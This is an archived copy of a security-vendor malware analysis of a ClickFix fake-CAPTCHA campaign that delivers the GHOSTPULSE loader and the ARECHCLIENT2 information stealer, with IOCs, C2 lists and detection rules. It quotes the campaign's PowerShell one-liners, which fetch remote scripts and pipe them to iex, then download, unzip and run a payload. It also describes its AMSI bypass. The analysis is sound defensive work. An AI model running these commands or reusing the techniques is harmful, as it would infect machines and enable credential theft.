{
	"id": "95f8a1d5-153c-4723-9434-92974a29fc62",
	"created_at": "2026-04-06T00:09:20.879916Z",
	"updated_at": "2026-04-10T03:20:47.703425Z",
	"deleted_at": null,
	"sha1_hash": "fed5336516fd55a91a02fa46f6ed22c66040cbfc",
	"title": "A Wretch Client: From ClickFix deception to information stealer deployment",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5844091,
	"plain_text": "A Wretch Client: From ClickFix deception to information stealer\r\ndeployment\r\nBy Salim Bitam\r\nPublished: 2025-06-18 · Archived: 2026-04-05 23:22:45 UTC\r\nPreamble\r\nElastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various\r\nmalware through social engineering tactics.\r\nOur threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary\r\ninitial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that\r\nresults in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment\r\nof new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and\r\ninfostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant\r\nsurge in popularity.\r\nThis post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed,\r\nand the malware it ultimately delivers.\r\nKey takeaways\r\nClickFix: Remains a highly effective and prevalent initial access method.\r\nGHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with\r\nnew modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted\r\nfile.\r\nARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.\r\nThe Initial Hook: Deconstructing ClickFix's Social Engineering\r\nEvery successful multi-stage attack begins with a foothold, and in many recent campaigns, that initial step has been satisfied\r\nby ClickFix. ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very\r\nlaunchpad for compromise.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 1 of 15\n\nFake captcha\r\nAt its core, ClickFix is a social engineering technique designed to manipulate users into inadvertently executing malicious\r\ncode on their systems. It preys on common online behaviors and psychological tendencies, presenting users with deceptive\r\nprompts – often disguised as browser updates, system errors, or even CAPTCHA verifications. The trick is simple yet\r\nincredibly effective: instead of a direct download, the user is instructed to copy a seemingly harmless \"fix\" (which is a\r\nmalicious PowerShell command) and paste it directly into their operating system's run dialog. This seemingly voluntary\r\naction bypasses many traditional perimeter defenses, as the user initiates the process.\r\nClickFix first emerged on the threat landscape in March 2024, but it has rapidly gained traction, exploding in prevalence\r\nthroughout 2024 and continuing its aggressive ascent into 2025. Its effectiveness lies in exploiting \"verification fatigue\" –\r\nthe subconscious habit users develop of mindlessly clicking through security checks. When confronted with a familiar-https://www.elastic.co/security-labs/a-wretch-client\r\nPage 2 of 15\n\nlooking CAPTCHA or an urgent \"fix it\" button, many users, conditioned by routine, simply comply without scrutinizing the\r\nunderlying request. This makes ClickFix an incredibly potent initial access vector, favored by a broad spectrum of threat\r\nactors due to its high success rate in breaching initial defenses.\r\nOur recent Elastic Security research on EDDIESTEALER provides another concrete example of ClickFix's efficacy in\r\nfacilitating malware deployment, further underscoring its versatility and widespread adoption in the threat landscape.\r\nOur internal telemetry at Elastic corroborates this trend, showing a significant volume in ClickFix-related alerts across our\r\nobserved environments, particularly within Q1 2025. We've noted an increase in attempts compared to the previous quarter,\r\nwith a predominant focus on the deployment of mass infection malware, such as RATs and InfoStealers.\r\nA ClickFix Campaign's Journey to ARECHCLIENT2\r\nThe ClickFix technique often serves as the initial step in a larger, multi-stage attack. We've recently analyzed a campaign\r\nthat clearly shows this progression. This operation begins with a ClickFix lure, which tricks users into starting the infection\r\nprocess. After gaining initial access, the campaign deploys an updated version of the GHOSTPULSE Loader (also known\r\nas HIJACKLOADER, IDATLOADER). This loader then brings in an intermediate .NET loader. This additional stage is\r\nresponsible for delivering the final payload: an ARECHCLIENT2 (SECTOPRAT) sample, loaded directly into memory.\r\nThis particular attack chain demonstrates how adversaries combine social engineering with hidden loader capabilities and\r\nmultiple execution layers to steal data and gain remote control ultimately.\r\nExecution flow\r\nWe observed this exact campaign in our telemetry on , providing us with a direct look into its real-world execution and the\r\nsequence of its components.\r\nExecution flow in Kibana\r\nTechnical analysis of the infection\r\nThe infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.\r\nWe observed two infrastructures (both resolving to 50.57.243[.]90 )\r\nhttps://clients[.]dealeronlinemarketing[[.]]com/captcha/ and https://clients[.]contology[.]com/captcha/ that\r\ndeliver the same initial payload.\r\nUser interaction on this page initiates execution. GHOSTPULSE serves as the malware loader in this campaign. Elastic\r\nSecurity Labs has been closely tracking this loader, and our previous research (2023 and 2024) provided a detailed look into\r\nits initial capabilities.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 3 of 15\n\nFake captcha hosted by contology[.]com\r\nThe webpage is a heavily obfuscated JavaScript script that generates the HTML code and JavaScript, which copies a\r\nPowerShell command to the clipboard.\r\nObfuscated JavaScript of the captcha page\r\nInspecting the runtime HTML code in a browser, we can see the front end of the page, but not the script that is run after\r\nclicking on the checkbox Verify you are human.\r\nHTML code of the captcha page\r\nA simple solution is to run it in a debugger to retrieve the information during execution. The second JS code is obfuscated,\r\nbut we can easily identify two interesting functions. The first function, runClickedCheckboxEffects , retrieves the public IP\r\naddress of the machine by querying https://api.ipify[.]org?format=json, then it sends the IP address to the attacker’s\r\ninfrastructure, https://koonenmagaziner[.]click/counter/\u0026lt;IP_address\u003e, to log the infection.\r\nJavaScript of the captcha page\r\nThe second function copies a base64-encoded PowerShell command to the clipboard.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 4 of 15\n\nCommand copied to the clipboard by the JavaScript script\r\nPowerShell command copied to the clipboard\r\nWhich is the following when it is base64 decoded\r\n(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'\r\n -UseBasicParsing).content | iex\r\nWhen executed, it fetches the following PowerShell script:\r\nInvoke-WebRequest -Uri \"https://bitly[.]cx/iddD\" -OutFile\r\n \"$env:TEMP\\ComponentStyle.zip\"; Expand-Archive -Path\r\n \"$env:TEMP/ComponentStyle.zip\" -DestinationPath\r\n \"$env:TEMP\"; \u0026 \"$env:TEMP\\crystall\\Crysta_x86.exe\"\r\nThe observed infection process for this campaign involves GHOSTPULSE's deployment as follows: After the user executes\r\nthe PowerShell command copied by ClickFix, the initial script fetches and runs additional commands. These PowerShell\r\ncommands download a ZIP file ( ComponentStyle.zip ) from a remote location and then extract it into a temporary\r\ndirectory on the victim's system.\r\nExtracted contents include components for GHOSTPULSE, specifically a benign executable ( Crysta_X64.exe ) and a\r\nmalicious dynamic-link library ( DllXDownloadManager.dll ). This setup utilizes DLL sideloading, a technique in which the\r\nlegitimate executable loads the malicious DLL. The file ( Heeschamjet.rc ) is the IDAT file that contains the next stage's\r\npayloads in an encrypted format\r\nand the file Shonomteak.bxi, which is encrypted and used by the loader to fetch the stage 2 and configuration structure.\r\nContent of ComponentStyle.zip\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 5 of 15\n\nGHOSTPULSE\r\nStage 1\r\nGHOSTPULSE is malware dating back to 2023. It has continuously received numerous updates, including a new way to\r\nstore its encrypted payload in an image by embedding the payload in the PNG’s pixels, as detailed in Elastic’s 2024 research\r\nblog post, and new modules from Zscaler research.\r\nThe malware used in this campaign was shipped with an additional encrypted file named Shonomteak.bxi . During stage 1\r\nof the loader, it decrypts the file using a DWORD addition operation with a value stored in the file itself.\r\nDecryption of Shonomteak.bxi file\r\nThe malware then extracts the stage 2 code from the decrypted file Shonomteak.bxi and injects it into a loaded library using\r\nthe LibraryLoadA function. The library name is stored in the same decrypted file; in our case, it is vssapi.dll .\r\nThe stage 2 function is then called with a structure parameter containing the filename of the IDAT PNG file, the stage 2\r\nconfiguration that was inside the decrypted Shonomteak.bxi, and a boolean field b_detect_process set to True in our\r\ncase.\r\nStructure used in stage 2\r\nStage 2\r\nWhen the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes\r\nto see if they are running. If a process is detected, execution is delayed by 5 seconds.\r\nDelays execution by 5 seconds\r\nIn previous samples, we analyzed GHOSTPULSE, which had its configuration hardcoded directly in the binary. This\r\nsample, on the other hand, has all the necessary information required for the malware to function properly, stored in\r\nShonomteak.bxi, including:\r\nHashes for the DLL names and Windows APIs\r\nIDAT tag: used to find the start of the encrypted data in the PNG file\r\nIDAT string: Which is simply “IDAT”\r\nHashes of processes to scan for\r\nAPI fetching hashes stored in GHOSTPULSE configuration rather than hardcoded\r\nFinal thoughts on GHOSTPULSE\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 6 of 15\n\nGHOSTPULSE has seen multiple updates. The use of the IDAT header method to store the encrypted payload, rather than\r\nthe new method we discovered in 2024, which utilizes pixels to store the payload, may indicate that the builder of this\r\nfamily maintained both options for compiling new samples.\r\nOur configuration extractor performs payload extraction using both methods and can be used for mass analysis on samples.\r\nYou can find the updated tool in our labs-releases repository.\r\nPayload extraction from the GHOSTPULSE sample\r\nARECHCLIENT2\r\nIn 2025, a notable increase in activity involving ARECHCLIENT2 (SectopRAT) was observed. This heavily obfuscated\r\n.NET remote access tool, initially identified in November 2019 and known for its information-stealing features, is now being\r\ndeployed by GHOSTPULSE through the Clickfix social engineering technique. Our prior research documented the initial\r\ndeployment of GHOSTPULSE utilizing ARECHCLIENT2 around 2023.\r\nThe payload deployed by GHOSTPULSE in a newly created process is an x86 native .NET loader, which in its turn loads\r\nARECHCLIENT2.\r\nThe loader goes through 3 steps:\r\nPatching AMSI\r\nExtracting and decrypting the payload\r\nLoading the CLR, then reflectively loading ARECHCLIENT2\r\nMain entry of the .NET loader\r\nInterestingly, its error handling for debugging purposes is still present, in the form of message boxes using the\r\nMessageBoxA API, for example, when failing to find the .tls section, an error message box with the string \"D1\" is\r\ndisplayed.\r\nDebugging/error messages through a message box\r\nThe following is a table of all the error messages and their description:\r\nMessage Description\r\nF1 LoadLibraryExW hooking failed\r\nF2 AMSI patching failed\r\nD1 Unable to find .tls section\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 7 of 15\n\nMessage Description\r\nW2 Failed to load CLR\r\nThe malware sets up a hook on the LoadLibraryExW API. This hook waits for amsi.dll to be loaded, then sets another\r\nhook on AmsiScanBuffer 0 , effectively bypassing AMSI.\r\nHooking LoadLibraryExW\r\nAfter this, the loader fetches the pointer in memory to the .tls section by parsing the PE headers. The first 0x40 bytes of\r\nthis section serve as the XOR key, and the rest of the bytes contain the encrypted ARECHCLIENT2 sample, which the\r\nloader then decrypts.\r\nPayload decryption routine\r\nFinally, it loads the .NET Common Language Runtime (CLR) in memory with CLRCreateInstance Windows API before\r\nreflectively loading ARECHCLIENT2. The following is an example of how it is performed.\r\nARECHCLIENT2 is a potent remote access trojan and infostealer, designed to target a broad spectrum of sensitive user data\r\nand system information. The malware's core objectives primarily focus on:\r\nCredential and Financial Theft: ARECHCLIENT2 explicitly targets cryptocurrency wallets, browser-saved\r\npasswords, cookies, and autofill data. It also aims for credentials from FTP, VPN, Telegram, Discord, and Steam.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 8 of 15\n\nDNSPY view of the StealerSettingConfigParce class\r\nSystem Profiling and Reconnaissance: ARECHCLIENT2 gathers extensive system details, including the operating\r\nsystem version, hardware information, IP address, machine name, and geolocation (city, country, and time zone).\r\nDNSPY view of ScanResult class\r\nCommand Execution: ARECHCLIENT2 receives and executes commands from its command-and-control (C2)\r\nserver, granting attackers remote control over infected systems.\r\nThe ARECHCLIENT2 malware connects to its C2 144.172.97[.]2, which is hardcoded in the binary as an encrypted\r\nstring, and also retrieves its secondary C2 ( 143.110.230[.]167 ) IP from a hardcoded pastebin link\r\nhttps://pastebin[.]com/raw/Wg8DHh2x .\r\nARECHCLIENT2 configuration from DNSPY\r\nInfrastructure analysis\r\nThe malicious captcha page was hosted under two domains clients.dealeronlinemarketing[.]com and\r\nclients.contology[.]com under the URI /captcha and /Client pointing to the following IP address\r\n50.57.243[.]90 .\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 9 of 15\n\nWe've identified that both entities are linked to a digital advertising agency with a long operational history. Further\r\ninvestigation reveals that the company has consistently utilized client subdomains to host various content, including PDFs\r\nand forms, for advertising purposes.\r\nWe assess that the attacker has likely compromised the server 50.57.243[.]90 and is leveraging it by exploiting the\r\ncompany's existing infrastructure and advertising reach to facilitate widespread malicious activity.\r\nFurther down the attack chain, analysis of the ARECHCLIENT2 C2 IPs ( 143.110.230[.]167 and 144.172.97[.]2 )\r\nrevealed additional campaign infrastructure. Both servers are hosted on different autonomous systems, AS14061 and\r\nAS14956.\r\nPivoting on a shared banner hash (@ValidinLLC’s HOST-BANNER_0_HASH , which is the hash value of the web server\r\nresponse banners) revealed 120 unique servers across a range of autonomous systems over the last seven months. Of these\r\n120, 19 have been previously labeled by various other vendors as “Sectop RAT\" (aka ARECHCLIENT2) as documented in\r\nthe Maltrail repo.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 10 of 15\n\nARECHCLIENT2 Host Banner Hash Pivot, courtesy @ValidinLLC\r\nPerforming focused validations of the latest occurrences (first occurrence after June 1, 2025) against VirusTotal shows\r\ncommunity members have previously labeled all 13 as Sectop RAT C2.\r\nAll these servers have similar configurations:\r\nRunning Canonical Linux\r\nSSH on 22\r\nUnknown TCP on 443\r\nNginx HTTP on 8080 , and\r\nHTTP on 9000 (C2 port)\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 11 of 15\n\nARECHCLIENT2 C2 Server Profile, courtesy @censysio\r\nThe service on port 9000 has Windows server headers, whereas the SSH and NGINX HTTP services both specify Ubuntu\r\nas the operating system. This suggests a reverse proxy of the C2 to protect the actual server by maintaining disposable front-end redirectors.\r\nARECHCLIENT2 IOC:\r\nHOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20\r\nThis is an active campaign, and this infrastructure is being built and torn down at a high cadence over the last seven months.\r\nAs of publication, the following C2 nodes are still active:\r\nValue First Seen Last Seen\r\n66.63.187.22 2025-06-15 2025-06-15\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 12 of 15\n\nValue First Seen Last Seen\r\n45.94.47.164 2025-06-02 2025-06-15\r\n84.200.17.129 2025-06-04 2025-06-15\r\n82.117.255.225 2025-03-14 2025-06-15\r\n45.77.154.115 2025-06-05 2025-06-15\r\n144.172.94.120 2025-05-20 2025-06-15\r\n79.124.62.10 2025-05-15 2025-06-15\r\n82.117.242.178 2025-03-14 2025-06-15\r\n195.82.147.132 2025-04-10 2025-06-15\r\n62.60.247.154 2025-05-18 2025-06-15\r\n91.199.163.74 2025-04-03 2025-06-15\r\n172.86.72.81 2025-03-13 2025-06-15\r\n107.189.24.67 2025-06-02 2025-06-15\r\n143.110.230.167 2025-06-08 2025-06-15\r\n185.156.72.80 2025-05-15 2025-06-15\r\n85.158.110.179 2025-05-11 2025-06-15\r\n144.172.101.228 2025-05-13 2025-06-15\r\n192.124.178.244 2025-06-01 2025-06-15\r\n107.189.18.56 2025-04-27 2025-06-15\r\n194.87.29.62 2025-05-18 2025-06-15\r\n185.156.72.63 2025-06-12 2025-06-12\r\n193.149.176.31 2025-06-08 2025-06-12\r\n45.141.87.249 2025-06-12 2025-06-12\r\n176.126.163.56 2025-05-06 2025-06-12\r\n185.156.72.71 2025-05-15 2025-06-12\r\n91.184.242.37 2025-05-15 2025-06-12\r\n45.141.86.159 2025-05-15 2025-06-12\r\n67.220.72.124 2025-06-05 2025-06-12\r\n45.118.248.29 2025-01-28 2025-06-12\r\n172.105.148.233 2025-06-03 2025-06-10\r\n194.26.27.10 2025-05-06 2025-06-10\r\n45.141.87.212 2025-06-08 2025-06-08\r\n45.141.86.149 2025-05-15 2025-06-08\r\n172.235.190.176 2025-06-08 2025-06-08\r\n45.141.86.82 2024-12-13 2025-06-08\r\n45.141.87.7 2025-05-13 2025-06-06\r\n185.125.50.140 2025-04-06 2025-06-03\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 13 of 15\n\nConclusion\r\nThis multi-stage cyber campaign effectively leverages ClickFix social engineering for initial access, deploying the\r\nGHOSTPULSE loader to deliver an intermediate .NET loader, ultimately culminating in the memory-resident\r\nARECHCLIENT2 payload. This layered attack chain gathers extensive credentials, financial, and system data, while also\r\ngranting attackers remote control capabilities over compromised machines.\r\nMITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an\r\naction.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nCommand and Control\r\nCollection\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing\r\nSpearphishing Link User Execution\r\nMalicious Link\r\nMalicious File\r\nCommand and Scripting Interpreter\r\nPowerShell\r\nDeobfuscation/Decoding\r\nDLL Sideloading\r\nReflective Loading\r\nUser Interaction\r\nIngress Tool Transfer\r\nSystem Information Discovery\r\nProcess Discovery\r\nSteal Web Session Cookie\r\nDetecting [malware]\r\nDetection\r\nElastic Defend detects this threat with the following behavior protection rules:\r\nSuspicious Command Shell Execution via Windows Run\r\nDNS Query to Suspicious Top Level Domain\r\nLibrary Load of a File Written by a Signed Binary Proxy\r\nConnection to WebService by a Signed Binary Proxy\r\nPotential Browser Information Discovery\r\nYARA\r\nWindows_Trojan_GhostPulse\r\nWindows_Trojan_Arechclient2\r\nObservations\r\nThe following observables were discussed in this research.\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 14 of 15\n\nObservable Type Name Reference\r\nclients.dealeronlinemarketing[.]com domain Captcha subdomain\r\nclients.contology[.]com domain Captcha subdomain\r\nkoonenmagaziner[.]click domain\r\n50.57.243[.]90\r\nipv4-\r\naddr\r\nclients.dealeronlinem\r\n\u0026 clients.contology[.\r\n144.172.97[.]2\r\nipv4-\r\naddr\r\nARECHCLIENT2 C\u0026C\r\n143.110.230[.]167\r\nipv4-\r\naddr\r\nARECHCLIENT2 C\u0026C\r\npastebin[.]com/raw/Wg8DHh2x\r\nipv4-\r\naddr\r\nContains ARECHCLIEN\r\nIP\r\n2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a\r\nSHA-256\r\nDivXDownloadManager.dll GHOSTPULSE\r\na8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90\r\nSHA-256\r\nHeeschamjiet.rc PNG GHOSTPULSE\r\nf92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55\r\nSHA-256\r\nDOTNET LOADER\r\n4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9\r\nSHA-256\r\nARECHCLIENT2\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://x.com/SI_FalconTeam/status/1915790796948643929\r\nhttps://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics\r\nSource: https://www.elastic.co/security-labs/a-wretch-client\r\nhttps://www.elastic.co/security-labs/a-wretch-client\r\nPage 15 of 15\n\nAs of publication, the Value following C2 nodes are still active: First Seen  Last Seen\n66.63.187.22 2025-06-15  2025-06-15\n Page 12 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.elastic.co/security-labs/a-wretch-client"
	],
	"report_names": [
		"a-wretch-client"
	],
	"threat_actors": [],
	"ts_created_at": 1775434160,
	"ts_updated_at": 1775791247,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.pdf",
		"text": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.txt",
		"img": "https://archive.orkl.eu/fed5336516fd55a91a02fa46f6ed22c66040cbfc.jpg"
	}
}